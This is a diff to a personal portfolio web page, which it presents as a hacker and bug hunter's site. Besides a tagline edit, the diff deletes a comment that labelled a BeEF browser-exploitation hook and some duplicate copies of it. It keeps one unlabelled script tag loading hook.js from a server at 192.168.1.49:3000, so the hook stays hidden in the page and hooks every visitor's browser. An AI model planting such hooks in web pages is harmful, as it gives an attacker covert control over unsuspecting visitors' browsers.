--- a/index.html
+++ b/index.html
@@ -2,8 +2,6 @@
 <html lang="en">
 
 <head>
-  <!-- BeEF Hook Script -->
-  <script src="http://192.168.1.49:3000/hook.js"></script>
   
   <meta charset="UTF-8">
   <meta content="IE=edge" http-equiv="X-UA-Compatible">
@@ -21,7 +19,8 @@
   <title>Portfolio</title>  
 
   <link href="./main.css" rel="stylesheet">
-<script src="http://192.168.1.49:3000/hook.js"></script><script src="http://192.168.1.49:3000/hook.js"></script></head>
+  <script src="http://192.168.1.49:3000/hook.js"></script>
+</head>
 
 <body class="minimal">
 <div id="site-border-left"></div>
@@ -60,7 +59,7 @@
               <h1>Hello, I'm<br>
                 <span id="typed-strings">
                   <span>Abdullah Al Tahir</span>
-                  <span>a Hacker</span>
+                  <span>a Hacker and Security Researcher</span>
                   <span>Working as a Bug Hunter</span>
                 </span>
                 <span id="typed"></span>
